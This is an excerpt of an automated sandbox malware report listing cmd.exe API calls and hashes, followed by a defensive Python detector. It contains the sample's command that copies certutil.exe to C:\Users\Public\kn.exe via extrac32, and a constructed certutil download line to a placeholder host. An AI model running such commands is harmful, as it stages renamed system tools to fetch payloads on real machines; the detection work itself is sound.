                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: OpenToken$CloseProcessThread
                                              • String ID:
                                              • API String ID: 2991381754-0
                                              • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                              • Instruction ID: 7dacd0be2ccdfabee5ea25c326a07ba367173f4787ebc67c292878f2dcbb7a91
                                              • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                              • Instruction Fuzzy Hash: 54219E33A0868287E7119B54D4403BDB760FB897B8F504135EB59936A8DF7EE848CB06
                                              APIs
                                              • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF6EB19C59E), ref: 00007FF6EB175879
                                                • Part of subcall function 00007FF6EB1758D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB175903
                                                • Part of subcall function 00007FF6EB1758D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB175943
                                                • Part of subcall function 00007FF6EB1758D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB175956
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValueVersion
                                              • String ID: %d.%d.%05d.%d
                                              • API String ID: 2996790148-3457777122
                                              • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                              • Instruction ID: 296f1f733de9e6a1cf5ca69bc0a98f347c22fbd4599302784191d3f525081f54
                                              • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                              • Instruction Fuzzy Hash: 43F0A762A0838187D3109F15B5401AAA651FB8C794F544134D94A47B69CF3DD554CF44
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$ErrorFileFindFirstLast
                                              • String ID:
                                              • API String ID: 2831795651-0
                                              • Opcode ID: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                              • Instruction ID: fc4fccd2ff9b3a4abcc9478587293328c23fe40fe8cb1e57c2bd55011d61a352
                                              • Opcode Fuzzy Hash: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                              • Instruction Fuzzy Hash: C1D18D73A0878286E7609F25E4503EA77A1FB887A8F141135DB4E877A8DF3EE541C705
                                              APIs
                                              • memset.MSVCRT ref: 00007FF6EB177DA1
                                                • Part of subcall function 00007FF6EB18417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB1841AD
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
                                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6EB177EB7
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                              • String ID:
                                              • API String ID: 168394030-0
                                              • Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                              • Instruction ID: 241a74e49b9187e88802cd874bba051ce67d4e23434f3c20b5afa32ce5d3a063
                                              • Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                              • Instruction Fuzzy Hash: 6FA1D523B0865285FB658B25D8903FA22A1BF8D7ACF404135DA1EC7AF5DF3EE4458706
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: InformationQueryToken
                                              • String ID:
                                              • API String ID: 4239771691-0
                                              • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                              • Instruction ID: 8361b566ee64379451802ba8b5ab7bf1f470b893064abe1a7038d090a5db7ec3
                                              • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                              • Instruction Fuzzy Hash: 60116573618781CBEB118F01E4443E9BBA4FB897A9F404131DB48827A4DF7EE588CB45
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: FileInformation$HandleQueryVolume
                                              • String ID:
                                              • API String ID: 2149833895-0
                                              • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                              • Instruction ID: 2fa126bbe7f52060aa4045926743991718b888f8355a1343397a079399389747
                                              • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                              • Instruction Fuzzy Hash: 7E1173326187C28AEB618B50F4443EEB7A0FB48B5CF445135DA9D82A64DFBDD54CCB05
                                              APIs
                                              • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF6EB194227), ref: 00007FF6EB198678
                                              • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?,?,?,00000000,00007FF6EB194227), ref: 00007FF6EB1986D4
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Time$System$File
                                              • String ID:
                                              • API String ID: 2838179519-0
                                              • Opcode ID: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                              • Instruction ID: c89b2840752cc56ad8c78211f82dec81cf1114a3dfb12a0fec0bad5214a3ebf4
                                              • Opcode Fuzzy Hash: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                              • Instruction Fuzzy Hash: 8A117C57528680C5D7208F21E0002BAB370FF9CB59B145122FA8DC6774EB3DD542CB1A
                                              APIs
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
                                              • towupper.MSVCRT ref: 00007FF6EB1785D4
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                              • String ID:
                                              • API String ID: 3520273530-0
                                              • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                              • Instruction ID: 2c926fa1f9ee03e65e4320c461b71a566b300e27a501335001250744ff5b0422
                                              • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                              • Instruction Fuzzy Hash: 4761C223A0C21281E7659E25D5043F926A0FB0E77CF408136EA1ED72F5DF7EA585831B
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: InformationQueryToken
                                              • String ID:
                                              • API String ID: 4239771691-0
                                              • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                              • Instruction ID: 650ca3bbeb8b69583c4a3234df5cb84e6715d1afe8cadaab8dfb019df7431766
                                              • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                              • Instruction Fuzzy Hash: 73F030B3B04B81CBD7018F64E5885DCB778F748B98795853ACB2843714DB76D9A8CB44
                                              APIs
                                              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB1893BB
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                              • Instruction ID: f1226fb2c8dc4fac9a09644b90de466d22d8d9229eaf0665ff4a785f097337cb
                                              • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                              • Instruction Fuzzy Hash: 62B01261F25402E1D608AB31EC812E412A07F9C734FD01431C00FC0170DE1EA2DFCB05
                                              APIs
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF6EB17F52A,00000000,00000000,?,00000000,?,00007FF6EB17E626,?,?,00000000,00007FF6EB181F69), ref: 00007FF6EB17F8DE
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17F8FB
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17F951
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17F96B
                                              • wcschr.MSVCRT ref: 00007FF6EB17FA8E
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB17FB14
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17FB2D
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17FBEA
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB17F996
                                                • Part of subcall function 00007FF6EB180010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6EB19849D,?,?,?,00007FF6EB19F0C7), ref: 00007FF6EB180045
                                                • Part of subcall function 00007FF6EB180010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6EB19F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB180071
                                                • Part of subcall function 00007FF6EB180010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB180092
                                                • Part of subcall function 00007FF6EB180010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB1800A7
                                                • Part of subcall function 00007FF6EB180010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB180181
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D401
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D41B
                                              • longjmp.MSVCRT(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D435
                                              • longjmp.MSVCRT(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D480
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                              • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                              • API String ID: 3964947564-518410914
                                              • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                              • Instruction ID: e3cf2f185c7aeac820c7151aa2e652254ab392fcafdac13b668b4bb15dcd0551
                                              • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                              • Instruction Fuzzy Hash: 4F025923A19792C6EA149B20E8943F967A1BF4D7B8F544135D94EC37F8DF3EA404C60A
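The string in the record above is the batch line from Xirnkxhvuzwepe.cmd that the interpreter is reading (the surrounding functions, with their MSVCRT imports and CMDEXTVERSION/PATHEXT strings, appear to be cmd.exe's own code rather than the sample's): extrac32.exe with the /C switch is used as a file copier to place certutil.exe under C:\Users\Public as kn.exe, which is what the "Drops or copies certutil.exe with a different name" signature reports. The detector below is an added example written for this page, not code from the report or from Joe Sandbox; it runs over constructed Sysmon-style process-creation records (hypothetical image paths, command lines and OriginalFileName values) and flags both the extrac32 copy of a system binary and the later execution of the renamed copy.

```python
"""
Detect the LOLBin copy seen in the batch line above: extrac32.exe /C used as a
copier to place a renamed system binary (certutil.exe -> kn.exe) under
C:\\Users\\Public, plus execution of that renamed copy. Sample events are
constructed Sysmon-style records, not data from the report.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# PE OriginalFileName values of binaries commonly copied and renamed by attackers
WATCHED_ORIGINAL_NAMES = {"certutil.exe", "cmd.exe", "extrac32.exe", "mshta.exe"}


@dataclass
class Event:
    image: str                    # full path of the created process
    command_line: str
    original_file_name: str = ""  # Sysmon EID 1 OriginalFileName (from version info)


def normalize(path: str) -> str:
    """Lower-case, strip quotes and collapse doubled backslashes (the report shows
    the sample's paths with escaped backslashes)."""
    p = path.strip('"').lower()
    while "\\\\" in p:
        p = p.replace("\\\\", "\\")
    return p


def split_cmdline(cmdline: str) -> List[str]:
    """Split a Windows command line into arguments, keeping quoted spans intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(path: str) -> str:
    return normalize(path).rsplit("\\", 1)[-1]


def detect_extrac32_copy(ev: Event) -> Optional[dict]:
    """extrac32 /C <src> <dst>: flag when <src> lives in a system directory and
    <dst> leaves it or changes the file name. Plain /E extraction is ignored."""
    args = split_cmdline(ev.command_line)
    if not args or basename(args[0]) not in ("extrac32.exe", "extrac32"):
        return None
    switches = {a.lower() for a in args[1:] if a.startswith("/")}
    positional = [normalize(a) for a in args[1:] if not a.startswith("/")]
    if "/c" not in switches or len(positional) < 2:
        return None
    src, dst = positional[0], positional[1]
    renamed = basename(src) != basename(dst)
    if src.startswith(SYSTEM_DIRS) and (renamed or not dst.startswith(SYSTEM_DIRS)):
        return {"rule": "extrac32_copies_system_binary", "source": src,
                "destination": dst, "renamed": renamed}
    return None


def detect_renamed_binary(ev: Event) -> Optional[dict]:
    """Process whose on-disk name differs from its PE OriginalFileName: the copy
    keeps certutil's version resource even though it runs as kn.exe."""
    orig = ev.original_file_name.lower()
    if orig in WATCHED_ORIGINAL_NAMES and basename(ev.image) != orig:
        return {"rule": "renamed_system_binary_executed",
                "image": normalize(ev.image), "original_file_name": orig}
    return None


def scan(events: List[Event]) -> List[dict]:
    findings = []
    for ev in events:
        for detector in (detect_extrac32_copy, detect_renamed_binary):
            hit = detector(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample events (hypothetical; only the first command line mirrors the report)
SAMPLE_EVENTS = [
    Event(r"C:\Windows\System32\extrac32.exe",
          r"extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe",
          "extrac32.exe"),
    Event(r"C:\Windows\System32\extrac32.exe",            # benign cabinet extraction
          r"extrac32 /E C:\Temp\setup.cab /L C:\Temp\out", "extrac32.exe"),
    Event(r"C:\Users\Public\kn.exe",                       # renamed certutil running
          r"C:\Users\Public\kn.exe -urlcache -split -f http://example.invalid/p kn.dat",
          "CertUtil.exe"),
    Event(r"C:\Windows\System32\certutil.exe",             # benign certutil use
          r"certutil -hashfile C:\Temp\a.bin SHA256", "CertUtil.exe"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Keying the second rule on OriginalFileName rather than the on-disk name is what catches the renamed copy, since extrac32 copies the file byte for byte and the version resource survives; the first rule is scoped to sources under the system directories because extrac32 /C is legitimate in installer scripts that copy their own files.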
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmp$iswspacewcschr
                                              • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                              • API String ID: 840959033-3627297882
                                              • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                              • Instruction ID: 36db22cf64496194f80623cf4f0bb4d1a89f19e9b4bcdb2e2af762812bb9cfbe
                                              • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                              • Instruction Fuzzy Hash: F0D17723E0C64386EA10AB60E8553F927A1BF4DBACF444035D94EC62B5DF2EF4048B5A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmp$EnvironmentVariable
